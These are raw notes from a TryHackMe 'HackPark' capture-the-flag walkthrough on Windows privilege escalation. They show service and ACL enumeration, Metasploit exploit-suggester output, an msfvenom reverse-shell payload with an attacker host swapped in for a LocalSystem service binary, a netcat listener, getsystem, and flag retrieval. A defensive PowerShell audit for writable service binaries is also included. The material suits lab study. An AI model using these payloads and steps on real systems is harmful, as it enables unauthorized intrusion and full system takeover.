(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: W32Time
DISPLAY_NAME: Windows Time
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: W3SVC
DISPLAY_NAME: World Wide Web Publishing Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: WAS
DISPLAY_NAME: Windows Process Activation Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Wcmsvc
DISPLAY_NAME: Windows Connection Manager
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: WindowsScheduler
DISPLAY_NAME: System Scheduler Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: WinHttpAutoProxySvc
DISPLAY_NAME: WinHTTP Web Proxy Auto-Discovery Service
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: Winmgmt
DISPLAY_NAME: Windows Management Instrumentation
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
SERVICE_NAME: WinRM
DISPLAY_NAME: Windows Remote Management (WS-Management)
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
THIS IS THE SERVICE THAT CATCHES OUR ATTENTION, AND IT IS THE ONE THM ASKS FOR:
SERVICE_NAME: WindowsScheduler
DISPLAY_NAME: System Scheduler Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
WE LOOK UP MORE SPECIFIC INFO ON THE SERVICE:
C:\Windows\Temp>sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WindowsScheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
WE CHECK THE SERVICE BINARY'S PERMISSIONS:
C:\PROGRA~2\SYSTEM~1>pwd
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
THM DOES NOT ACCEPT THE SERVICE NAME AS THE ANSWER:
WService.exe
*******.***
WScheduler.exe
SSAdmin.exe
Privilege.exe
WhoAmI.exe
WService.exe
WSLogon.exe
THIS IS THE BINARY WE SHOULD EXPLOIT. WE CHECK ITS PERMISSIONS (BUILTIN USERS), AS OPPOSED TO THE MAIN BINARY RUN BY THE SERVICE PATH:
C:\PROGRA~2\SYSTEM~1>icacls Message.exe
Message.exe Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
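The Everyone:(I)(M) entry above is the misconfiguration this section goes on to abuse: any local user can overwrite a binary that LocalSystem later executes. As an added example that is not part of the original write-up, the following PowerShell audit enumerates every service whose executable carries such an ACE; the list of low-privileged principals and the mask of "write" rights are this example's assumptions.

```powershell
# Added example, not part of the original write-up: find services whose
# executable is writable by low-privileged principals, the weakness shown by
# "Everyone:(I)(M)" on WService.exe. Run from an elevated PowerShell prompt.

# Extract the executable path from a Win32_Service PathName value.
# Handles quoted paths followed by arguments as well as bare paths such as
# C:\PROGRA~2\SYSTEM~1\WService.exe.
function Get-ServiceBinaryPath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $null
    }
    # Unquoted path: everything up to the first ".exe"; the rest is arguments.
    $m = [regex]::Match($p, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $p.Split(' ')[0]
}

# True when an ACE grants a right that lets the holder rewrite, replace or
# re-ACL the binary. Which rights count is this example's assumption.
function Test-WriteRight {
    param([System.Security.AccessControl.FileSystemRights]$Rights)
    $raw = [int]$Rights
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, WriteDacl, TakeOwnership')
    # GENERIC_ALL (0x10000000) and GENERIC_WRITE (0x40000000) appear as
    # unresolved numeric rights on some ACEs; treat them as write access too.
    $genericMask = 0x10000000 -bor 0x40000000
    return (($raw -band $writeMask) -ne 0) -or (($raw -band $genericMask) -ne 0)
}

# Enumerate services and report ACEs that let low-privileged principals
# modify the service executable. The Inherited column matters for the fix:
# an "(I)" entry must be corrected on the parent directory, not on the file.
function Find-WritableServiceBinary {
    param(
        [string[]]$LowPrivPrincipals = @(
            'Everyone',
            'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users',
            'NT AUTHORITY\INTERACTIVE'
        )
    )
    $findings = @()
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        try { $acl = Get-Acl -LiteralPath $exe -ErrorAction Stop } catch { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $who = $ace.IdentityReference.Value
            if ($LowPrivPrincipals -notcontains $who) { continue }
            if (-not (Test-WriteRight $ace.FileSystemRights)) { continue }
            $findings += [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Binary    = $exe
                Principal = $who
                Rights    = $ace.FileSystemRights.ToString()
                Inherited = $ace.IsInherited
            }
        }
    }
    return $findings
}

# Services running as LocalSystem with a writable binary are the highest risk.
Find-WritableServiceBinary |
    Sort-Object RunsAs, Service |
    Format-Table Service, RunsAs, Principal, Rights, Inherited, Binary -AutoSize
```

On this box the WindowsScheduler row would show Everyone with Modify and Inherited = True, meaning the weak ACE comes from the C:\PROGRA~2\SYSTEM~1 directory and the remediation belongs on the directory ACL rather than on WService.exe alone.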
--------
SCAN FROM THE METERPRETER SESSION USING THE POST-EXPLOITATION MODULE multi/recon/local_exploit_suggester:
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.123.185 - Collecting local exploits for x86/windows...
[*] 10.10.123.185 - 173 exploit checks are being tried...
[+] 10.10.123.185 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.123.185 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.123.185 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.123.185 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.123.185 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
3 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
4 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
5 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
6 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
7 exploit/windows/local/always_install_elevated No The target is not exploitable.
8 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
9 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
10 exploit/windows/local/bthpan No The target is not exploitable.
11 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
12 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
13 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
14 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
15 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
16 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
17 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
18 exploit/windows/local/ikeext_service No The check raised an exception.
19 exploit/windows/local/ipass_launch_app No The check raised an exception.
20 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
21 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
22 exploit/windows/local/mqac_write No The target is not exploitable.
23 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
24 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows 2012 R2 (6.3 Build 9600). is not vulnerable
25 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
26 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
27 exploit/windows/local/ms14_058_track_popup_menu No The target is not exploitable.
28 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
29 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
30 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms_ndproxy No The target is not exploitable.
33 exploit/windows/local/novell_client_nicm No The target is not exploitable.
34 exploit/windows/local/ntapphelpcachecontrol No The target is not exploitable.
35 exploit/windows/local/ntusermndragover No The target is not exploitable.
36 exploit/windows/local/panda_psevents No The target is not exploitable.
37 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
38 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
39 exploit/windows/local/tokenmagic No The target is not exploitable.
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
-------
WE TRY TO EXPLOIT THIS, "INSECURE PERMISSIONS ON THE SERVICE EXECUTABLE", TO ESCALATE TO SYSTEM PRIVILEGES:
WE CREATE A REVERSE SHELL PAYLOAD TO SLIP IN AS THE ORIGINAL SERVICE BINARY SO THAT LOCALSYSTEM RUNS IT:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.82.143 LPORT=443 -f exe-service -o rev-svc.exe
WE TRANSFER THE FILE TO THE VICTIM MACHINE:
meterpreter > upload rev-svc.exe
[*] uploading : /root/rev-svc.exe -> rev-svc.exe
[*] Uploaded 47.50 KiB of 47.50 KiB (100.0%): /root/rev-svc.exe -> rev-svc.exe
[*] uploaded : /root/rev-svc.exe -> rev-svc.exe
Once the payload is on the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we also want to grant full permissions to the Everyone group:
move WService.exe WService.exe.bkp
C:\PROGRA~2\SYSTEM~1>move WService.exe WService.exe.bkp
1 file(s) moved.
dir
C:\PROGRA~2\SYSTEM~1>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\PROGRA~2\SYSTEM~1
01/26/2024 08:44 PM <DIR> .
01/26/2024 08:44 PM <DIR> ..
05/17/2007 12:47 PM 1,150 alarmclock.ico
08/31/2003 11:06 AM 766 clock.ico
08/31/2003 11:06 AM 80,856 ding.wav
01/26/2024 08:44 PM <DIR> Events
08/04/2019 03:36 AM 60 Forum.url
01/08/2009 07:21 PM 1,637,972 libeay32.dll
11/15/2004 11:16 PM 9,813 License.txt
01/26/2024 07:36 PM 1,496 LogFile.txt
01/26/2024 07:37 PM 3,760 LogfileAdvanced.txt
03/25/2018 09:58 AM 536,992 Message.exe
03/25/2018 09:59 AM 445,344 PlaySound.exe
03/25/2018 09:58 AM 27,040 PlayWAV.exe
08/04/2019 02:05 PM 149 Preferences.ini
03/25/2018 09:58 AM 485,792 Privilege.exe
03/24/2018 11:09 AM 10,100 ReadMe.txt
03/25/2018 09:58 AM 112,544 RunNow.exe
03/25/2018 09:59 AM 40,352 sc32.exe
08/31/2003 11:06 AM 766 schedule.ico
03/25/2018 09:58 AM 1,633,696 Scheduler.exe
03/25/2018 09:59 AM 491,936 SendKeysHelper.exe
03/25/2018 09:58 AM 437,664 ShowXY.exe
03/25/2018 09:58 AM 439,712 ShutdownGUI.exe
03/25/2018 09:58 AM 235,936 SSAdmin.exe
03/25/2018 09:58 AM 731,552 SSCmd.exe
01/08/2009 07:12 PM 355,446 ssleay32.dll
03/25/2018 09:58 AM 456,608 SSMail.exe
08/04/2019 03:36 AM 6,999 unins000.dat
08/04/2019 03:36 AM 722,597 unins000.exe
08/04/2019 03:36 AM 54 Website.url
06/26/2009 04:27 PM 6,574 whiteclock.ico
03/25/2018 09:58 AM 76,704 WhoAmI.exe
05/16/2006 03:49 PM 785,042 WSCHEDULER.CHM
05/16/2006 02:58 PM 2,026 WScheduler.cnt
03/25/2018 09:58 AM 331,168 WScheduler.exe
05/16/2006 03:58 PM 703,081 WSCHEDULER.HLP
03/25/2018 09:58 AM 136,096 WSCtrl.exe
03/25/2018 09:58 AM 98,720 WService.exe.bkp
03/25/2018 09:58 AM 68,512 WSLogon.exe
03/25/2018 09:59 AM 33,184 WSProc.dll
38 File(s) 11,148,259 bytes
3 Dir(s) 39,128,014,848 bytes free
WE MOVE OUR MSFVENOM REVERSE SHELL PAYLOAD INTO THE SERVICE DIRECTORY:
move C:\Windows\Temp\rev-svc.exe WService.exe
C:\PROGRA~2\SYSTEM~1>move C:\Windows\Temp\rev-svc.exe WService.exe
1 file(s) moved.
dir
C:\PROGRA~2\SYSTEM~1>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\PROGRA~2\SYSTEM~1
01/26/2024 08:48 PM <DIR> .
01/26/2024 08:48 PM <DIR> ..
05/17/2007 12:47 PM 1,150 alarmclock.ico
08/31/2003 11:06 AM 766 clock.ico
08/31/2003 11:06 AM 80,856 ding.wav
01/26/2024 08:47 PM <DIR> Events
08/04/2019 03:36 AM 60 Forum.url
01/08/2009 07:21 PM 1,637,972 libeay32.dll
11/15/2004 11:16 PM 9,813 License.txt
01/26/2024 07:36 PM 1,496 LogFile.txt
01/26/2024 07:37 PM 3,760 LogfileAdvanced.txt
03/25/2018 09:58 AM 536,992 Message.exe
03/25/2018 09:59 AM 445,344 PlaySound.exe
03/25/2018 09:58 AM 27,040 PlayWAV.exe
08/04/2019 02:05 PM 149 Preferences.ini
03/25/2018 09:58 AM 485,792 Privilege.exe
03/24/2018 11:09 AM 10,100 ReadMe.txt
03/25/2018 09:58 AM 112,544 RunNow.exe
03/25/2018 09:59 AM 40,352 sc32.exe
08/31/2003 11:06 AM 766 schedule.ico
03/25/2018 09:58 AM 1,633,696 Scheduler.exe
03/25/2018 09:59 AM 491,936 SendKeysHelper.exe
03/25/2018 09:58 AM 437,664 ShowXY.exe
03/25/2018 09:58 AM 439,712 ShutdownGUI.exe
03/25/2018 09:58 AM 235,936 SSAdmin.exe
03/25/2018 09:58 AM 731,552 SSCmd.exe
01/08/2009 07:12 PM 355,446 ssleay32.dll
03/25/2018 09:58 AM 456,608 SSMail.exe
08/04/2019 03:36 AM 6,999 unins000.dat
08/04/2019 03:36 AM 722,597 unins000.exe
08/04/2019 03:36 AM 54 Website.url
06/26/2009 04:27 PM 6,574 whiteclock.ico
03/25/2018 09:58 AM 76,704 WhoAmI.exe
05/16/2006 03:49 PM 785,042 WSCHEDULER.CHM
05/16/2006 02:58 PM 2,026 WScheduler.cnt
03/25/2018 09:58 AM 331,168 WScheduler.exe
05/16/2006 03:58 PM 703,081 WSCHEDULER.HLP
03/25/2018 09:58 AM 136,096 WSCtrl.exe
01/26/2024 08:43 PM 48,640 WService.exe
03/25/2018 09:58 AM 98,720 WService.exe.bkp
03/25/2018 09:58 AM 68,512 WSLogon.exe
03/25/2018 09:59 AM 33,184 WSProc.dll
39 File(s) 11,196,899 bytes
3 Dir(s) 39,127,986,176 bytes free
WE GRANT FULL PERMISSIONS TO THE PAYLOAD:
icacls WService.exe /grant Everyone:F
WE STOP THE SERVICE SO THAT IT RESTARTS, START IT AGAIN, AND WAIT FOR THE SYSTEM-PRIVILEGED SHELL IN NETCAT:
sc stop WindowsScheduler
sc start WindowsScheduler
PERMISSION DENIED
meterpreter > execute -f cmd -c "sc stop WindowsScheduler"
meterpreter > execute -f cmd -c "sc start WindowsScheduler"
IT DID NOT WORK; LET'S TRY MODIFYING THE FILE MESSAGE.EXE:!!!!
move Message.exe Message.exe.bkp
C:\PROGRA~2\SYSTEM~1>move Message.exe Message.exe.bkp
1 file(s) moved.
move WService.exe Message.exe
C:\PROGRA~2\SYSTEM~1>move WService.exe Message.exe
1 file(s) moved.
move WService.exe.bkp WService.exe
C:\PROGRA~2\SYSTEM~1>move WService.exe.bkp WService.exe
1 file(s) moved.
icacls Message.exe /grant Everyone:F
THAT DID NOT WORK EITHER, IT DOES NOT LET US SET PERMISSIONS!!!!!
icacls rev-svc.exe /grant Everyone:F
sc config WindowsScheduler binPath= "C:\Windows\Temp\rev-svc.exe" obj= LocalSystem
THAT DID NOT WORK EITHER, IT DOES NOT LET US SET PERMISSIONS!!!!!
WE LISTEN ON PORT 443 SO THAT THE PAYLOAD SENDS US BACK A SHELL WITH THE PRIVILEGES OF LOCAL SYSTEM, THE ACCOUNT THAT RUNS THE ORIGINAL SERVICE:
┌──(root㉿kali)-[~]
└─# nc -lnvp 443
listening on [any] 443 ...
WE HAD NO SUCCESS WITH THESE ATTEMPTS; LET'S SEE WHETHER WE CAN ABUSE IMPERSONATE PRIVILEGES:
SERVICE_NAME: WinRM
DISPLAY_NAME: Windows Remote Management (WS-Management)
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Windows\Temp>sc qc WinRM
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WinRM
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\svchost.exe -k NetworkService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Windows Remote Management (WS-Management)
DEPENDENCIES : RPCSS
: HTTP
SERVICE_START_NAME : NT AUTHORITY\NetworkService
IT DID NOT WORK...!!!!!!!!
*********************************** SYSTEM ******************
WE TRY METERPRETER'S PRIVILEGE ESCALATION COMMAND AND BINGO, WE ARE SYSTEM; IT USED TECHNIQUE 5:
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > sysinfo
Computer : HACKPARK
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
---
WE BREAK DOWN TECHNIQUE 5 THAT GETSYSTEM USED TO ESCALATE PRIVILEGES AUTOMATICALLY WITH THIS METERPRETER COMMAND; IT TOOK ADVANTAGE OF A PRIVILEGE ESCALATION VULNERABILITY IN THIS SERVICE, AS CHECKED WITH GPT:
SERVICE_NAME: Spooler
DISPLAY_NAME: Print Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
c:\windows\system32\inetsrv>sc qc Spooler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\spoolsv.exe
LOAD_ORDER_GROUP : SpoolerGroup
TAG : 0
DISPLAY_NAME : Print Spooler
DEPENDENCIES : RPCSS
: http
SERVICE_START_NAME : LocalSystem
C:\Windows\System32\spoolsv.exe NT SERVICE\TrustedInstaller:(F)
BUILTIN\Administrators:(RX)
NT AUTHORITY\SYSTEM:(RX)
BUILTIN\Users:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
JEFF'S FLAG:
meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2019-08-03 18:15:04 +0000 .NET v4.5
040777/rwxrwxrwx 8192 dir 2019-08-03 18:15:04 +0000 .NET v4.5 Classic
040777/rwxrwxrwx 8192 dir 2019-08-05 21:03:44 +0000 Administrator
040777/rwxrwxrwx 0 dir 2013-08-22 14:48:41 +0000 All Users
040555/r-xr-xr-x 8192 dir 2014-03-21 19:16:56 +0000 Default
040777/rwxrwxrwx 0 dir 2013-08-22 14:48:41 +0000 Default User
040555/r-xr-xr-x 4096 dir 2013-08-22 15:39:32 +0000 Public
100666/rw-rw-rw- 174 fil 2013-08-22 15:37:57 +0000 desktop.ini
040777/rwxrwxrwx 8192 dir 2019-08-04 18:54:53 +0000 jeff
meterpreter > cd jeff
meterpreter > ls
Listing: C:\Users\jeff
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 AppData
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Application Data
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Contacts
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Cookies
040555/r-xr-xr-x 0 dir 2019-08-04 18:55:14 +0000 Desktop
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Documents
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Downloads
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Favorites
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Links
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Local Settings
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Music
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 My Documents
100666/rw-rw-rw- 524288 fil 2024-01-27 03:47:12 +0000 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2019-08-04 18:57:22 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-08-04 18:57:22 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-08-04 18:57:22 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 NetHood
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Pictures
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 PrintHood
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Recent
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Saved Games
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Searches
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 SendTo
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Start Menu
040777/rwxrwxrwx 0 dir 2019-08-04 18:54:52 +0000 Templates
040555/r-xr-xr-x 0 dir 2019-08-04 18:54:53 +0000 Videos
100666/rw-rw-rw- 274432 fil 2019-08-04 18:54:52 +0000 ntuser.dat.LOG1
100666/rw-rw-rw- 98304 fil 2019-08-04 18:54:52 +0000 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2019-08-04 18:54:52 +0000 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\jeff\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-08-04 18:54:53 +0000 desktop.ini
100666/rw-rw-rw- 32 fil 2019-08-04 18:57:10 +0000 user.txt
meterpreter > cat user.txt
759bd8af507517bcfaede78a21a73e39
ADMINISTRATOR (ROOT) FLAG:
meterpreter > pwd
C:\Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2019-08-03 18:15:04 +0000 .NET v4.5
040777/rwxrwxrwx 8192 dir 2019-08-03 18:15:04 +0000 .NET v4.5 Classic
040777/rwxrwxrwx 8192 dir 2019-08-05 21:03:44 +0000 Administrator
040777/rwxrwxrwx 0 dir 2013-08-22 14:48:41 +0000 All Users
040555/r-xr-xr-x 8192 dir 2014-03-21 19:16:56 +0000 Default
040777/rwxrwxrwx 0 dir 2013-08-22 14:48:41 +0000 Default User
040555/r-xr-xr-x 4096 dir 2013-08-22 15:39:32 +0000 Public
100666/rw-rw-rw- 174 fil 2013-08-22 15:37:57 +0000 desktop.ini
040777/rwxrwxrwx 8192 dir 2019-08-04 18:54:53 +0000 jeff
meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Users\Administrator
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 AppData
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Application Data
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Contacts
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Cookies
040555/r-xr-xr-x 0 dir 2019-08-04 18:49:15 +0000 Desktop
040555/r-xr-xr-x 4096 dir 2019-08-03 17:43:54 +0000 Documents
040555/r-xr-xr-x 4096 dir 2020-10-02 21:38:28 +0000 Downloads
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Favorites
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Links
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Local Settings
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Music
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 My Documents
100666/rw-rw-rw- 524288 fil 2020-10-02 22:10:58 +0000 NTUSER.DAT
